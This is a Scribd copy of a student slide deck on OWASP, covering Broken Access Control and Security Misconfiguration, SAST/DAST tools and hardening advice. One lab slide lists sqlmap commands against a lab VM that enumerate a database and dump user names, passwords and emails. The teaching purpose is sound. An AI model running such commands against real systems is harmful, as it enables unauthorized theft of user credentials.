Scribd Logo
Upload

Welcome to Scribd!

  • Information Security - Standards and Best Practices Owasp

    Uploaded by

    Imad Boustany
    16 views46 pages
    pres3

    Original Title

    Presentation1

    Copyright

    © © All Rights Reserved

    Available Formats

    PPTX, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    pres3

    Copyright:

    © All Rights Reserved
    Download as PPTX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    16 views46 pages

    Information Security - Standards and Best Practices Owasp

    Uploaded by

    Imad Boustany
    pres3

    Copyright:

    © All Rights Reserved
    Download as PPTX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 46

    Information Security –

    Standards and Best


    Practices

    Presented by:
    OWASP
    Supervisor & Professor:
    Imad Boustany
    Jean-Michel Kaoukabani

    INCI – M2: Information Security OWASP Page 1


    Who is the OWASP foundation?

    The Open Web Application Security Project® (OWASP)


    is a nonprofit foundation that works to improve the
    security of software.

    INCI – M2: Information Security OWASP Page 2


    TOP 10 VULNERABILITES

    INCI – M2: Information Security OWASP Page 3


    Broken Access Control
    What is it?

    Attackers access unauthorized functionalities in


    order access other users accounts, view sensitive
    files, etc…

    INCI – M2: Information Security OWASP Page 4


    Broken Access Control
    Threat Agents / Attack Vectors

    Exploitation of access control is a core skill of


    attackers. SAST and DAST tools can detect the
    absence of access control but cannot verify if it is
    functional when it is present.

    INCI – M2: Information Security OWASP Page 5


    Broken Access Control
    Security Weakness

    Access control weaknesses are common due to the


    lack of automated detection, and lack of effective
    functional testing by application developers.

    INCI – M2: Information Security OWASP Page 6


    Broken Access Control
    Impacts

    The technical impact is attackers acting as users or


    administrators, or users using privileged functions.

    INCI – M2: Information Security OWASP Page 7


    Broken Access Control
    Common Access Control Vulnerabilities

    • Modifying the URL.


    • Elevation of privilege.
    • Metadata manipulation.
    • CORS misconfiguration allows unauthorized API
    access.
    • Force browsing to authenticated pages as an
    unauthenticated user or to privileged pages as a
    standard user.

    INCI – M2: Information Security OWASP Page 8


    Broken Access Control
    How to prevent?

    • With the exception of public resources, deny by


    default.
    • Implement access control mechanisms once and
    re-use them throughout the application.
    • Model access controls should enforce record
    ownership.
    • Log access control failures.
    • Disable web server directory listing and ensure
    file metadata are not present within web roots.

    INCI – M2: Information Security OWASP Page 9


    Broken Access Control
    different types of access control

    • Discretionary Access Control (DAC)


    • Mandatory Access Control (MAC)
    • Role Based Access Control (RBAC)
    • Attribute Based Access Control (ABAC)

    INCI – M2: Information Security OWASP Page 10


    Broken Access Control
    LAB: SQL Injection Using Vega OWASP_B_W_A

    INCI – M2: Information Security OWASP Page 11


    Broken Access Control
    LAB: SQL Injection Using Vega OWASP_B_W_A

    INCI – M2: Information Security OWASP Page 12


    Broken Access Control
    LAB: SQL Injection Using Vega OWASP_B_W_A

    INCI – M2: Information Security OWASP Page 13


    Broken Access Control
    LAB: SQL Injection Using Vega OWASP_B_W_A

    INCI – M2: Information Security OWASP Page 14


    Broken Access Control
    LAB: SQL Injection Using Vega OWASP_B_W_A

    INCI – M2: Information Security OWASP Page 15


    Broken Access Control
    LAB: SQL Injection Using Vega OWASP_B_W_A

    INCI – M2: Information Security OWASP Page 16


    Broken Access Control
    LAB: SQL Injection Using Vega OWASP_B_W_A

    SQLMAP TOOL ON KALI LINUX:


    • sqlmap -u "http://192.168.155.143/owaspbricks/content-2/index.php?user=harry" --dbs
    • sqlmap -u "http://192.168.155.143/owaspbricks/content-2/index.php?user=harry" --dbms=mysql
    --users
    • sqlmap -u "http://192.168.155.143/owaspbricks/content-2/index.php?user=harry" -D bricks –tables
    • sqlmap -u "http://192.168.155.143/owaspbricks/content-2/index.php?user=harry" -D bricks -T users
    --columns
    • sqlmap -u "http://192.168.155.143/owaspbricks/content-2/index.php?user=harry" -D bricks -T users
    -C name,password,email --dump

    INCI – M2: Information Security OWASP Page 17


    Broken Access Control
    LAB: SQL Injection Using Vega OWASP_B_W_A

    INCI – M2: Information Security OWASP Page 18


    Broken Access Control
    LAB: SQL Injection Using Vega OWASP_B_W_A

    INCI – M2: Information Security OWASP Page 19


    Broken Access Control
    LAB: SQL Injection Using Vega OWASP_B_W_A

    INCI – M2: Information Security OWASP Page 20


    Broken Access Control
    LAB: SQL Injection Using Vega OWASP_B_W_A

    INCI – M2: Information Security OWASP Page 21


    Broken Access Control
    LAB: SQL Injection Using Vega OWASP_B_W_A

    INCI – M2: Information Security OWASP Page 22


    Broken Access Control
    LAB: SQL Injection Using Vega OWASP_B_W_A

    INCI – M2: Information Security OWASP Page 23


    Broken Access Control
    LAB: SQL Injection Using Vega OWASP_B_W_A

    INCI – M2: Information Security OWASP Page 24


    Broken Access Control
    SAST: Static Application Security Testing

    Designed to analyze source code or compiled


    versions of code to help find security flaws.

    INCI – M2: Information Security OWASP Page 25


    Broken Access Control
    SAST: Static Application Security Testing / Strengths and Weakness

    Strengths: Weakness:
    • Scales well • Many types of security vulnerabilities are
    • Output is good for developers. difficult to find automatically.
    • High numbers of false positives.
    • Many of these tools have difficulty analyzing
    code that can’t be compiled.

    INCI – M2: Information Security OWASP Page 26


    Broken Access Control
    SAST: Bandit tool

    INCI – M2: Information Security OWASP Page 27


    Broken Access Control
    SAST: HuskyCI

    INCI – M2: Information Security OWASP Page 28


    Broken Access Control
    DAST: Dynamic Application Security Testing

    Web Application Vulnerability Scanners are


    automated tools that scan web applications, to
    look for security vulnerabilities such as Cross-site
    scripting, SQL Injection and insecure server
    configuration.

    INCI – M2: Information Security OWASP Page 29


    Broken Access Control
    DAST: Vega

    INCI – M2: Information Security OWASP Page 30


    Broken Access Control
    DAST: Burp Suite

    INCI – M2: Information Security OWASP Page 31


    Broken Access Control
    DAST: Vega vs Burp Suite (From Benchmark)

    INCI – M2: Information Security OWASP Page 32


    Security Misconfiguration
    What is it?

    • Missing security hardening or incorrect


    permissions on app/server.
    • Unnecessary features/ports are available.
    • Default accounts enabled.
    • Error leakage.
    • Updated security features are left disabled or
    misconfigured.
    • Insecure configuration in web app or server
    frameworks.
    • Lack of security headers.

    INCI – M2: Information Security OWASP Page 33


    Security Misconfiguration
    How common is it?

    • Quite common because it covers so many areas


    of a system.
    • Common due to lack of automated deployment
    tooling.
    • Exists across many systems and in many
    different forms.

    INCI – M2: Information Security OWASP Page 34


    Security Misconfiguration
    Directory Listing

    INCI – M2: Information Security OWASP Page 35


    Security Misconfiguration
    Directory Listing

    INCI – M2: Information Security OWASP Page 36


    Security Misconfiguration
    Directory Listing

    INCI – M2: Information Security OWASP Page 37


    Security Misconfiguration
    Detailed errors

    INCI – M2: Information Security OWASP Page 38


    Security Misconfiguration
    Detailed errors

    INCI – M2: Information Security OWASP Page 39


    Security Misconfiguration
    SSL Labs Checking

    INCI – M2: Information Security OWASP Page 40


    Security Misconfiguration
    SSL Labs Checking

    INCI – M2: Information Security OWASP Page 41


    Security Misconfiguration
    SSL Labs Checking

    INCI – M2: Information Security OWASP Page 42


    Security Misconfiguration
    Security Headers

    INCI – M2: Information Security OWASP Page 43


    Security Misconfiguration
    Security Headers

    INCI – M2: Information Security OWASP Page 44


    Security Misconfiguration
    How to fix it?

    • Consistent process for server and app


    hardening.
    • Consider minimal server as starting point.
    • Regular consideration of new vulnerabilities.
    • Segmentation of systems to reduce risk.
    • Automated and online server checks.

    INCI – M2: Information Security OWASP Page 45


    References

    • https://www.youtube.com/watch?v=tmPxTqi2vSs&feature=youtu.be
    • https://owasp.org/
    • https://sourceforge.net/projects/owaspbwa/
    • https://portswigger.net/
    • https://Securityheaders.com
    • https://.Ssllabs.com
    • https://subgraph.com/vega/
    • https://github.com/globocom/huskyCI
    • https://pypi.org/project/bandit/

    INCI – M2: Information Security OWASP Page 46

    You might also like